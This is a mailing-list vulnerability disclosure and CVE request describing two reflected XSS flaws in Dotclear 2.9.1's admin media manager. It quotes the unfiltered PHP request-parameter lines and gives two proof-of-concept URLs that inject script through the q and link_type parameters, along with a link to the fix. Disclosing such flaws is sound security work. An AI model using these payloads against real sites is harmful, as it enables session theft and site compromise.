Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 2 Aug 2016 06:13:03 +0000
From: 陈瑞琦 <chenruiqi@....cn>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
CC: limingxing <limingxing@....cn>
Subject: CVE request: XSS vulns in Dotclear v2.9.1

I found some XSS vulns in Dotclear v2.9.1

Title: XSS vulns in Dotclear v2.9.1
Author: Chen Ruiqi, Chenruiqi@....cn
Date: 2016-08-01
Download Site: https://dotclear.org/download
Vendor: dotclear.org
Vendor Notified: 2016-08-01
Vendor Contact: security@...clear.net
--------------------------------------------------------------------------------------------------------
Discription:
Dotclear is an open source blog publishing application distributed under the GNU GPLv2. Developed originally by Olivier Meunier from 2002, Dotclear has now attracted a solid team of developers.[2] It is relatively popular in French speaking countries, where it is used by several major blogging platforms (Gandi Blogs,[3] Marine nationale,[4] etc.).(Wiki)
-----------------------------------------------------------------------------------------------------------
Vulnerability:
There are two reflected XSS vulns in Dotclear v2.9.1 media manager

/admin/media.php
line 34 $link_type = !empty($_REQUEST['link_type']) ? $_REQUEST['link_type'] : null;
line 62 $q = isset($_REQUEST['q']) ? $_REQUEST['q'] : null;

Lack of filter before put the user-input into the page.
--------------------------------------------------------------------------------------------------------
PoC Code:
http://*.*.*.*/dotclear/admin/media.php?q=77777%3C%2Fspan%3E%3Cscript%3Ealert(1)%3C/script%3E&popup=0&select=0&plugin_id=&post_id=&link_type=
http://*.*.*.*/dotclear/admin/media.php?q=77777&popup=0&select=0&plugin_id=&post_id=&link_type=8888%22%3E%3Cscript%3Ealert(1)%3C/script%3E
----------------------------------------------------------------------------------------------------------
Fix Code:
https://hg.dotclear.org/dotclear/rev/40d0207e520d


Could you assign CVE id for those?

Thank you

Chen Ruiqi
Codesafe Team

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ